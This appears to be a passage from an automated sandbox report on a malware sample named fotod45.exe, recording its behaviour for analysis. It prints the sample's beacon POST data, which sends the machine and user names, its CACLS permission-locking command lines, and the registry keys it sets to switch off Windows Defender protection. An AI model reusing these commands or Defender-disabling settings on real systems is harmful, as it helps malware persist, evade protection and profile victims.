HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\3ec1f323b5" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	CACLS "danke.exe" /P "test22:R" /E
cmdline	CACLS "..\3ec1f323b5" /P "test22:R" /E
cmdline	CACLS "danke.exe" /P "test22:N"
cmdline	cmd /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	"C:\Users\test22\AppData\Local\Temp\1000012051\du.exe"
cmdline	C:\Users\test22\AppData\Local\Temp\1000012051\du.exe

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

fotod45.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All